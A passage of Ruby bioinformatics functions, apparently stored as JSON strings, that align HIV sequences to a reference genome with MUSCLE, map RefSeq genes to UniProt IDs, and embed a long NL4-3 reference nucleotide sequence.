l2 = l2 + g2\n end\n end\n\n while repeat == 1\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n #refine alignment\n\n if ref =~ /^(\\-+)/\n l1 = l1 - $1.size\n elsif ref =~ /(\\-+)$/\n l2 = l2 + $1.size\n end\n\n if (hxb2_l - l2 - 1) >= l1\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n ref_size = 
ref.size\n    sim_count = 0\n    (0..(ref_size-1)).each do |n|\n      ref_base = ref[n]\n      test_base = aln_test[n]\n      sim_count += 1 if ref_base == test_base\n    end\n    similarity = (sim_count/ref_size.to_f*100).round(1)\n    print `rm -f #{temp_file}`\n    print `rm -f #{temp_aln}`\n    loc_p1 = l1 + 1\n    loc_p2 = hxb2_l - l2\n    if seq.size != (loc_p2 - loc_p1 + 1)\n      indel = true\n    elsif aln_test.include?(\"-\")\n      indel = true\n    else\n      indel = false\n    end\n    return [loc_p1,loc_p2,similarity,indel,aln_test,ref]\n  else\n    # failure: drop the stray seventh zero so this matches the six-element success return\n    return [0,0,0,0,0,0]\n  end\n  rescue\n    print `rm -f #{temp_file}`\n    print `rm -f #{temp_aln}`\n    return [0,0,0,0,0,0]\n  end\nend",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def split_refseq\n # prepare output files\n system(%Q[cut -f4 #{$prepare_dir}/refseq_genes_result.tsv | cut -c1-5 | sort | uniq > #{$prepare_dir}/refp_prefix_list.txt ]) # get exist prefix list of protein_id\n FileUtils.mkdir_p(\"#{$prepare_dir}/refp\") unless File.exist?(\"#{$prepare_dir}/refp\")\n refp_output = {}\n File.open(\"#{$prepare_dir}/refp_prefix_list.txt\") do |f|\n f.each_line do |line|\n prefix = line.chomp.strip\n refp_output[prefix] = File.open(\"#{$prepare_dir}/refp/#{prefix}.dat\", \"w\")\n end\n end\n refp_output[\"no_protein_id\"] = File.open(\"#{$prepare_dir}/refp/no_protein_id.dat\", \"w\") # protein_id is optional\n\n File.open(\"#{$prepare_dir}/refseq_genes_result.tsv\") do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n prefix = (columns[3].nil? || columns[3] == \"\") ? \"no_protein_id\" : columns[3][0..4] # protein_id is optional\n refp_output[prefix].puts line.chomp.strip\n end\n end\n refp_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def muscle_sequence(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return aln_seq\nend",
"def NL43_locator(seq=\"\",temp_dir=File.dirname($0))\n hxb2_ref = \"TGGAAGGGCTAATTTGGTCCCAAAAAAGACAAGAGATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTGGCAGAACTACACACCAGGGCCAGGGATCAGATATCCACTGACCTTTGGATGGTGCTTCAAGTTAGTACCAGTTGAACCAGAGCAAGTAGAAGAGGCCAAATAAGGAGAGAAGAACAGCTTGTTACACCCTATGAGCCAGCATGGGATGGAGGACCCGGAGGGAGAAGTATTAGTGTGGAAGTTTGACAGCCTCCTAGCATTTCGTCACATGGCCCGAGAGCTGCATCCGGAGTACTACAAAGACTGCTGACATCGAGCTTTCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGTGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATGCTACATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTCAAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCAGTGGCGCCCGAACAGGGACTTGAAAGCGAAAGTAAAGCCAGAGGAGATCTCTCGACGCAGGACTCGGCTTGCTGAAGCGCGCACGGCAAGAGGCGAGGGGCGGCGACTGGTGAGTACGCCAAAAATTTTGACTAGCGGAGGCTAGAAGGAGAGAGATGGGTGCGAGAGCGTCGGTATTAAGCGGGGGAGAATTAGATAAATGGGAAAAAATTCGGTTAAGGCCAGGGGGAAAGAAACAATATAAACTAAAACATATAGTATGGGCAAGCAGGGAGCTAGAACGATTCGCAGTTAATCCTGGCCTTTTAGAGACATCAGAAGGCTGTAGACAAATACTGGGACAGCTACAACCATCCCTTCAGACAGGATCAGAAGAACTTAGATCATTATATAATACAATAGCAGTCCTCTATTGTGTGCATCAAAGGATAGATGTAAAAGACACCAAGGAAGCCTTAGATAAGATAGAGGAAGAGCAAAACAAAAGTAAGAAAAAGGCACAGCAAGCAGCAGCTGACACAGGAAACAACAGCCAGGTCAGCCAAAATTACCCTATAGTGCAGAACCTCCAGGGGCAAATGGTACATCAGGCCATATCACCTAGAACTTTAAATGCATGGGTAAAAGTAGTAGAAGAGAAGGCTTTCAGCCCAGAAGTAATACCCATGTTTTCAGCATTATCAGAAGGAGCCACCCCACAAGATTTAAATACCATGCTAAACACAGTGGGGGGACATCAAGCAGCCATGCAAATGTTAAAAGAGACCATCAATGAGGAAGCTGCAGAATGGGATAGATTGCATCCAGTGCATGCAGGGCCTATTGCACCAGGCCAGATGAGAGAACCAAGGGGAAGTGACATAGCAGGAACTACTAGTACCCTTCAGGAACAAATAGGATGGATGACACATAATCCACCTATCCCAGTAGGAGAAATCTATAAAAGATGGATAATCCTGGGATTAAATAAAATAGTAAGAATGTATAGCCCTACCAGCATTCTGGACATAAGACAAGGACCAAAGGAACCCTTTAGAGACTATGTAGACCGATTCTATAAAACTCTAAGAGCCGAGCAAGCTTCACAAGAGGTAAAAAATTGGATGACAGAAACCTTGTTGGTCCAAAATGCGAACCCAGATTGTAAGACTATTTTAAAAGCATTGGGACCAGGAGCGACACTAGAAGAAATGATGACAGCATGTCAGGGAGTGGGGGGACCCGGCCATAAAGCAAGAGTTTTGGCTGAAGCAATGAGCCAAGTAACAAATCCAGCTACCATAATGATACAGAAAGGCAATTTTAGGAACCAAAGAAAGACTGTTAAGTGTTTCAATTGTGGCAAAGAAGGGCACATAGCCAAAAATTGCAGGGCCCCTAGGAAAAAGGGCTGTTGGAAATGTGGAAAGGAAGGACACCAAATGAAAGATTGTACTGAGAGACAGGCTAATTTTTTAGGGAAGATCTGGCCTTCCCACAAGGGAAGGCCAGGGAATTTTCTTCAGAGCAGACCAGAGCCAACAGCCCCACCAGAAGAGAGCTTCAGGTTTGGGGAAGAGACAACAACTCCCTCTCAGAAGCAGGAGCCGATAGACAAGGAACTGTATCCTTTAGCTTCCCTCAGATCACTCTTTGGCAGCGACCCCTCGTCACAATAAAGATAGGGGGGCAATTAAAGGAAGCTCTATTAGATACAGGAGCAGATGATACAGTATTAGAAGAAATGAATTTGCCAGGAAGATGGAAACCAAAAATGATAGGGGGAATTGGAGGTTTTATCAAAGTAAGACAGTATGATCAGATACTCATAGAAATCTGCGGACATAAAGCTATAGGTACAGTATTAGTAGGACCTACACCTGTCAACATAATTGGAAGAAATCTGTTGACTCAGATTGGCTGCACTTTAAATTTTCCCATTAGTCCTATTGAGACTGTACCAGTAAAATTAAAGCCAGGAATGGATGGCCCAAAAGTTAAACAATGGCCATTGACAGAAGAAAAAATAAAAGCATTAGTAGAAATTTGTACAGAAATGGAAAAGGAAGGAAAAATTTCAAAAATTGGGCCTGAAAATCCATACAATACTCCAGTATTTGCCATAAAGAAAAAAGACAGTACTAAATGGAGAAAATTAGTAGATTTCAGAGAACTTAATAAGAGAACTCAAGATTTCTGGGAAGTTCAATTAGGAATACCACATCCTGCAGGGTTAAAACAGAAAAAATCAGTAACAGTACTGGATGTGGGCGATGCATATTTTTCAGTTCCCTTAGATAAAGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCACAGGGATGGAAAGGATCACCAGCAATATTCCAGTGTAGCATGACAAAAATCTTAGAGCCTTTTAGAAAACAAAATCCAGACATAGTCATCTATCAATACATGGATGATTTGTATGTAGGATCTGACTTAGAAATAGGGCAGCATAGAACAAAAATAGAGGAACTGAGACAACATCTGTTGAGGTGGGGATTTACCACACCAGACAAAAAACATCAGAAAGAACCTCCATTCCTTTGGATGGGTTATGAACTCCATCCTGATAAATGGACAGTACAGCCTATAGTGCTGCCAGAAAAGGACAGCTGGACTGTCAATGACATACAGAAATTAGTGGGAAAATTGAATTGGGCAAGTCAGATTTATGCAGGGATTAAAGTAAGGCAATTATGTAAACTTCTTAGGGGAACCAAAGCACTAACAGAAGTAGTACCACTAACAGAAGAAGCAGAGCTAGAACTGGCAGAAAACAGGGAGATTCTAAAAGAAC
CGGTACATGGAGTGTATTATGACCCATCAAAAGACTTAATAGCAGAAATACAGAAGCAGGGGCAAGGCCAATGGACATATCAAATTTATCAAGAGCCATTTAAAAATCTGAAAACAGGAAAATATGCAAGAATGAAGGGTGCCCACACTAATGATGTGAAACAATTAACAGAGGCAGTACAAAAAATAGCCACAGAAAGCATAGTAATATGGGGAAAGACTCCTAAATTTAAATTACCCATACAAAAGGAAACATGGGAAGCATGGTGGACAGAGTATTGGCAAGCCACCTGGATTCCTGAGTGGGAGTTTGTCAATACCCCTCCCTTAGTGAAGTTATGGTACCAGTTAGAGAAAGAACCCATAATAGGAGCAGAAACTTTCTATGTAGATGGGGCAGCCAATAGGGAAACTAAATTAGGAAAAGCAGGATATGTAACTGACAGAGGAAGACAAAAAGTTGTCCCCCTAACGGACACAACAAATCAGAAGACTGAGTTACAAGCAATTCATCTAGCTTTGCAGGATTCGGGATTAGAAGTAAACATAGTGACAGACTCACAATATGCATTGGGAATCATTCAAGCACAACCAGATAAGAGTGAATCAGAGTTAGTCAGTCAAATAATAGAGCAGTTAATAAAAAAGGAAAAAGTCTACCTGGCATGGGTACCAGCACACAAAGGAATTGGAGGAAATGAACAAGTAGATGGGTTGGTCAGTGCTGGAATCAGGAAAGTACTATTTTTAGATGGAATAGATAAGGCCCAAGAAGAACATGAGAAATATCACAGTAATTGGAGAGCAATGGCTAGTGATTTTAACCTACCACCTGTAGTAGCAAAAGAAATAGTAGCCAGCTGTGATAAATGTCAGCTAAAAGGGGAAGCCATGCATGGACAAGTAGACTGTAGCCCAGGAATATGGCAGCTAGATTGTACACATTTAGAAGGAAAAGTTATCTTGGTAGCAGTTCATGTAGCCAGTGGATATATAGAAGCAGAAGTAATTCCAGCAGAGACAGGGCAAGAAACAGCATACTTCCTCTTAAAATTAGCAGGAAGATGGCCAGTAAAAACAGTACATACAGACAATGGCAGCAATTTCACCAGTACTACAGTTAAGGCCGCCTGTTGGTGGGCGGGGATCAAGCAGGAATTTGGCATTCCCTACAATCCCCAAAGTCAAGGAGTAATAGAATCTATGAATAAAGAATTAAAGAAAATTATAGGACAGGTAAGAGATCAGGCTGAACATCTTAAGACAGCAGTACAAATGGCAGTATTCATCCACAATTTTAAAAGAAAAGGGGGGATTGGGGGGTACAGTGCAGGGGAAAGAATAGTAGACATAATAGCAACAGACATACAAACTAAAGAATTACAAAAACAAATTACAAAAATTCAAAATTTTCGGGTTTATTACAGGGACAGCAGAGATCCAGTTTGGAAAGGACCAGCAAAGCTCCTCTGGAAAGGTGAAGGGGCAGTAGTAATACAAGATAATAGTGACATAAAAGTAGTGCCAAGAAGAAAAGCAAAGATCATCAGGGATTATGGAAAACAGATGGCAGGTGATGATTGTGTGGCAAGTAGACAGGATGAGGATTAACACATGGAAAAGATTAGTAAAACACCATATGTATATTTCAAGGAAAGCTAAGGACTGGTTTTATAGACATCACTATGAAAGTACTAATCCAAAAATAAGTTCAGAAGTACACATCCCACTAGGGGATGCTAAATTAGTAATAACAACATATTGGGGTCTGCATACAGGAGAAAGAGACTGGCATTTGGGTCAGGGAGTCTCCATAGAATGGAGGAAAAAGAGATATAGCACACAAGTAGACCCTGACCTAGCAGACCAACTAATTCATCTGCACTATTTTGATTGTTTTTCAGAATCTGCTATAAGAAATACCATATTAGGACGTATAGTTAGTCCTAGGTGTGAATATCAAGCAGGACATAACAAGGTAGGATCTCTACAGTACTTGGCACTAGCAGCATTAATAAAACCAAAACAGATAAAGCCACCTTTGCCTAGTGTTAGGAAACTGACAGAGGACAGATGGAACAAGCCCCAGAAGACCAAGGGCCACAGAGGGAGCCATACAATGAATGGACACTAGAGCTTTTAGAGGAACTTAAGAGTGAAGCTGTTAGACATTTTCCTAGGATATGGCTCCATAACTTAGGACAACATATCTATGAAACTTACGGGGATACTTGGGCAGGAGTGGAAGCCATAATAAGAATTCTGCAACAACTGCTGTTTATCCATTTCAGAATTGGGTGTCGACATAGCAGAATAGGCGTTACTCGACAGAGGAGAGCAAGAAATGGAGCCAGTAGATCCTAGACTAGAGCCCTGGAAGCATCCAGGAAGTCAGCCTAAAACTGCTTGTACCAATTGCTATTGTAAAAAGTGTTGCTTTCATTGCCAAGTTTGTTTCATGACAAAAGCCTTAGGCATCTCCTATGGCAGGAAGAAGCGGAGACAGCGACGAAGAGCTCATCAGAACAGTCAGACTCATCAAGCTTCTCTATCAAAGCAGTAAGTAGTACATGTAATGCAACCTATAATAGTAGCAATAGTAGCATTAGTAGTAGCAATAATAATAGCAATAGTTGTGTGGTCCATAGTAATCATAGAATATAGGAAAATATTAAGACAAAGAAAAATAGACAGGTTAATTGATAGACTAATAGAAAGAGCAGAAGACAGTGGCAATGAGAGTGAAGGAGAAGTATCAGCACTTGTGGAGATGGGGGTGGAAATGGGGCACCATGCTCCTTGGGATATTGATGATCTGTAGTGCTACAGAAAAATTGTGGGTCACAGTCTATTATGGGGTACCTGTGTGGAAGGAAGCAACCACCACTCTATTTTGTGCATCAGATGCTAAAGCATATGATACAGAGGTACATAATGTTTGGGCCACACATGCCTGTGTACCCACAGACCCCAACCCACAAGAAGTAGTATTGGTAAATGTGACAGAAAATTTTAACATGTGGAAAAATGACATGGTAGAACAGATGCATGAGGATATAATCAGTTTATGGGATCAAAGCCTAAAGCCATGTGTAAAATTAACCCCACTCTGTGTTAGTTTAAAGTGCACTGATTTGAAGAATGATACTAATACCAATAGTAGTAGCGGGAGAATGATAATGGAGAAAGGAGAGATAAAAAACTGCTCTTTCAATATCAGCACAAGCATAAGAGATAAGGTGCAGAAAGAATATGCATTCTTTTATAAACTTGATATAGTACCAATAGATAATACCAGCTATAGGTTGATAAGTTGTAACACCTCAGTCATTACACAGGCCTGTCCAAAGGTATCCTTTGAGCCAATTCCCATACATTATTGTGCCCCGGCTGGTTTTGCGATTCTAAAATGTAATAATAAGACGTTCAATGGAACAGGACCATGTACAAATGTCAGCACAGTACAATGTACACATGGAATCAGGCCAGTAGTATCAACTCAACTGCTGTTAAATGGCAGTCTAGCAGAAGAAGATGTAGTAATTAGATCTGCCAA
TTTCACAGACAATGCTAAAACCATAATAGTACAGCTGAACACATCTGTAGAAATTAATTGTACAAGACCCAACAACAATACAAGAAAAAGTATCCGTATCCAGAGGGGACCAGGGAGAGCATTTGTTACAATAGGAAAAATAGGAAATATGAGACAAGCACATTGTAACATTAGTAGAGCAAAATGGAATGCCACTTTAAAACAGATAGCTAGCAAATTAAGAGAACAATTTGGAAATAATAAAACAATAATCTTTAAGCAATCCTCAGGAGGGGACCCAGAAATTGTAACGCACAGTTTTAATTGTGGAGGGGAATTTTTCTACTGTAATTCAACACAACTGTTTAATAGTACTTGGTTTAATAGTACTTGGAGTACTGAAGGGTCAAATAACACTGAAGGAAGTGACACAATCACACTCCCATGCAGAATAAAACAATTTATAAACATGTGGCAGGAAGTAGGAAAAGCAATGTATGCCCCTCCCATCAGTGGACAAATTAGATGTTCATCAAATATTACTGGGCTGCTATTAACAAGAGATGGTGGTAATAACAACAATGGGTCCGAGATCTTCAGACCTGGAGGAGGCGATATGAGGGACAATTGGAGAAGTGAATTATATAAATATAAAGTAGTAAAAATTGAACCATTAGGAGTAGCACCCACCAAGGCAAAGAGAAGAGTGGTGCAGAGAGAAAAAAGAGCAGTGGGAATAGGAGCTTTGTTCCTTGGGTTCTTGGGAGCAGCAGGAAGCACTATGGGCTGCACGTCAATGACGCTGACGGTACAGGCCAGACAATTATTGTCTGATATAGTGCAGCAGCAGAACAATTTGCTGAGGGCTATTGAGGCGCAACAGCATCTGTTGCAACTCACAGTCTGGGGCATCAAACAGCTCCAGGCAAGAATCCTGGCTGTGGAAAGATACCTAAAGGATCAACAGCTCCTGGGGATTTGGGGTTGCTCTGGAAAACTCATTTGCACCACTGCTGTGCCTTGGAATGCTAGTTGGAGTAATAAATCTCTGGAACAGATTTGGAATAACATGACCTGGATGGAGTGGGACAGAGAAATTAACAATTACACAAGCTTAATACACTCCTTAATTGAAGAATCGCAAAACCAGCAAGAAAAGAATGAACAAGAATTATTGGAATTAGATAAATGGGCAAGTTTGTGGAATTGGTTTAACATAACAAATTGGCTGTGGTATATAAAATTATTCATAATGATAGTAGGAGGCTTGGTAGGTTTAAGAATAGTTTTTGCTGTACTTTCTATAGTGAATAGAGTTAGGCAGGGATATTCACCATTATCGTTTCAGACCCACCTCCCAATCCCGAGGGGACCCGACAGGCCCGAAGGAATAGAAGAAGAAGGTGGAGAGAGAGACAGAGACAGATCCATTCGATTAGTGAACGGATCCTTAGCACTTATCTGGGACGATCTGCGGAGCCTGTGCCTCTTCAGCTACCACCGCTTGAGAGACTTACTCTTGATTGTAACGAGGATTGTGGAACTTCTGGGACGCAGGGGGTGGGAAGCCCTCAAATATTGGTGGAATCTCCTACAGTATTGGAGTCAGGAACTAAAGAATAGTGCTGTTAACTTGCTCAATGCCACAGCCATAGCAGTAGCTGAGGGGACAGATAGGGTTATAGAAGTATTACAAGCAGCTTATAGAGCTATTCGCCACATACCTAGAAGAATAAGACAGGGCTTGGAAAGGATTTTGCTATAAGATGGGTGGCAAGTGGTCAAAAAGTAGTGTGATTGGATGGCCTGCTGTAAGGGAAAGAATGAGACGAGCTGAGCCAGCAGCAGATGGGGTGGGAGCAGTATCTCGAGACCTAGAAAAACATGGAGCAATCACAAGTAGCAATACAGCAGCTAACAATGCTGCTTGTGCCTGGCTAGAAGCACAAGAGGAGGAAGAGGTGGGTTTTCCAGTCACACCTCAGGTACCTTTAAGACCAATGACTTACAAGGCAGCTGTAGATCTTAGCCACTTTTTAAAAGAAAAGGGGGGACTGGAAGGGCTAATTCACTCCCAAAGAAGACAAGATATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTGGCAGAACTACACACCAGGGCCAGGGGTCAGATATCCACTGACCTTTGGATGGTGCTACAAGCTAGTACCAGTTGAGCCAGATAAGGTAGAAGAGGCCAATAAAGGAGAGAACACCAGCTTGTTACACCCTGTGAGCCTGCATGGAATGGATGACCCTGAGAGAGAAGTGTTAGAGTGGAGGTTTGACAGCCGCCTAGCATTTCATCACGTGGCCCGAGAGCTGCATCCGGAGTACTTCAAGAACTGCTGACATCGAGCTTGCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGCGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATGCTGCATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTTCAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCACCCAGGAGGTAGAGGTTGCAGTGAGCCAAGATCGCGCCACTGCATTCCAGCCTGGGCAAGAAAACAAGACTGTCTAAAATAATAATAATAAGTTAAGGGTATTAAATATATTTATACATGGAGGTCATAAAAATATATATATTTGGGCTGGGCGCAGTGGCTCACACCTGCGCCCGGCCCTTTGGGAGGCCGAGGCAGGTGGATCACCTGAGTTTGGGAGTTCCAGACCAGCCTGACCAACATGGAGAAACCCCTTCTCTGTGTATTTTTAGTAGATTTTATTTTATGTGTATTTTATTCACAGGTATTTCTGGAAAACTGAAACTGTTTTTCCTCTACTCTGATACCACAAGAATCATCAGCACAGAGGAAGACTTCTGTGATCAAATGTGGTGGGAGAGGGAGGTTTTCACCAGCACATGAGCAGTCAGTTCTGCCGCAGACTCGGCGGGTGTCCTTCGGTTCAGTTCCAACACCGCCTGCCTGGAGAGAGGTCAGACCACAGGGTGAGGGCTCAGTCCCCAAGACATAAACACCCAAGACATAAACACCCAACAGGTCCACCCCGCCTGCTGCCCAGGCAGAGCCGATTCACCAAGACGGGAATTAGGATAGAGAAAGAGTAAGTCACACAGAGCCGGCTGTGCGGGAGAACGGAGTTCTATTATGACTCAAATCAGTCTCCCCAAGCATTCGGGGATCAGAGTTTTTAAGGATAACTTAGTGTGTAGGGGGCCAGTGAGTTGGAGATGAAAGCGTAGGGAGTCGAAGGTGTCCTTTTGCGCCGAGTCAGTTCCTGGGTGGGGGCCACAAGATCGGATGAGCCAGTTTATCAATCCGGGGGTGCCAGCTGATCCATGGAGTGCAGGGTCTGCAAAATATCTCAA
GCACTGATTGATCTTAGGTTTTACAATAGTGATGTTACCCCAGGAACAATTTGGGGAAGGTCAGAATCTTGTAGCCTGTAGCTGCATGACTCCTAAACCATAATTTCTTTTTTGTTTTTTTTTTTTTATTTTTGAGACAGGGTCTCACTCTGTCACCTAGGCTGGAGTGCAGTGGTGCAATCACAGCTCACTGCAGCCTCAACGTCGTAAGCTCAAGCGATCCTCCCACCTCAGCCTGCCTGGTAGCTGAGACTACAAGCGACGCCCCAGTTAATTTTTGTATTTTTGGTAGAGGCAGCGTTTTGCCGTGTGGCCCTGGCTGGTCTCGAACTCCTGGGCTCAAGTGATCCAGCCTCAGCCTCCCAAAGTGCTGGGACAACCGGGCCCAGTCACTGCACCTGGCCCTAAACCATAATTTCTAATCTTTTGGCTAATTTGTTAGTCCTACAAAGGCAGTCTAGTCCCCAGCAAAAAGGGGGTTTGTTTCGGGAAAGGGCTGTTACTGTCTTTGTTTCAAACTATAAACTAAGTTCCTCCTAAACTTAGTTCGGCCTACACCCAGGAATGAACAAGGAGAGCTTGGAGGTTAGAAGCACGATGGAATTGGTTAGGTCAGATCTCTTTCACTGTCTGAGTTATAATTTTGCAATGGTGGTTCAAAGACTGCCCGCTTCTGACACCAGTCGCTGCATTAATGAATCGGCCAACGCGCGGGGAGAGGCGGTTTGCGTATTGGGCGCTCTTCCGCTTCCTCGCTCACTGACTCGCTGCGCTCGGTCGTTCGGCTGCGGCGAGCGGTATCAGCTCACTCAAAGGCGGTAATACGGTTATCCACAGAATCAGGGGATAACGCAGGAAAGAACATGTGAGCAAAAGGCCAGCAAAAGGCCAGGAACCGTAAAAAGGCCGCGTTGCTGGCGTTTTTCCATAGGCTCCGCCCCCCTGACGAGCATCACAAAAATCGACGCTCAAGTCAGAGGTGGCGAAACCCGACAGGACTATAAAGATACCAGGCGTTTCCCCCTGGAAGCTCCCTCGTGCGCTCTCCTGTTCCGACCCTGCCGCTTACCGGATACCTGTCCGCCTTTCTCCCTTCGGGAAGCGTGGCGCTTTCTCATAGCTCACGCTGTAGGTATCTCAGTTCGGTGTAGGTCGTTCGCTCCAAGCTGGGCTGTGTGCACGAACCCCCCGTTCAGCCCGACCGCTGCGCCTTATCCGGTAACTATCGTCTTGAGTCCAACCCGGTAAGACACGACTTATCGCCACTGGCAGCAGCCACTGGTAACAGGATTAGCAGAGCGAGGTATGTAGGCGGTGCTACAGAGTTCTTGAAGTGGTGGCCTAACTACGGCTACACTAGAAGGACAGTATTTGGTATCTGCGCTCTGCTGAAGCCAGTTACCTTCGGAAAAAGAGTTGGTAGCTCTTGATCCGGCAAACAAACCACCGCTGGTAGCGGTGGTTTTTTTGTTTGCAAGCAGCAGATTACGCGCAGAAAAAAAGGATCTCAAGAAGATCCTTTGATCTTTTCTACGGGGTCTGACGCTCAGTGGAACGAAAACTCACGTTAAGGGATTTTGGTCATGAGATTATCAAAAAGGATCTTCACCTAGATCCTTTTAAATTAAAAATGAAGTTTTAAATCAATCTAAAGTATATATGAGTAAACTTGGTCTGACAGTTACCAATGCTTAATCAGTGAGGCACCTATCTCAGCGATCTGTCTATTTCGTTCATCCATAGTTGCCTGACTCCCCGTCGTGTAGATAACTACGATACGGGAGGGCTTACCATCTGGCCCCAGTGCTGCAATGATACCGCGAGACCCACGCTCACCGGCTCCAGATTTATCAGCAATAAACCAGCCAGCCGGAAGGGCCGAGCGCAGAAGTGGTCCTGCAACTTTATCCGCCTCCATCCAGTCTATTAATTGTTGCCGGGAAGCTAGAGTAAGTAGTTCGCCAGTTAATAGTTTGCGCAACGTTGTTGCCATTGCTACAGGCATCGTGGTGTCACGCTCGTCGTTTGGTATGGCTTCATTCAGCTCCGGTTCCCAACGATCAAGGCGAGTTACATGATCCCCCATGTTGTGCAAAAAAGCGGTTAGCTCCTTCGGTCCTCCGATCGTTGTCAGAAGTAAGTTGGCCGCAGTGTTATCACTCATGGTTATGGCAGCACTGCATAATTCTCTTACTGTCATGCCATCCGTAAGATGCTTTTCTGTGACTGGTGAGTACTCAACCAAGTCATTCTGAGAATAGTGTATGCGGCGACCGAGTTGCTCTTGCCCGGCGTCAATACGGGATAATACCGCGCCACATAGCAGAACTTTAAAAGTGCTCATCATTGGAAAACGTTCTTCGGGGCGAAAACTCTCAAGGATCTTACCGCTGTTGAGATCCAGTTCGATGTAACCCACTCGTGCACCCAACTGATCTTCAGCATCTTTTACTTTCACCAGCGTTTCTGGGTGAGCAAAAACAGGAAGGCAAAATGCCGCAAAAAAGGGAATAAGGGCGACACGGAAA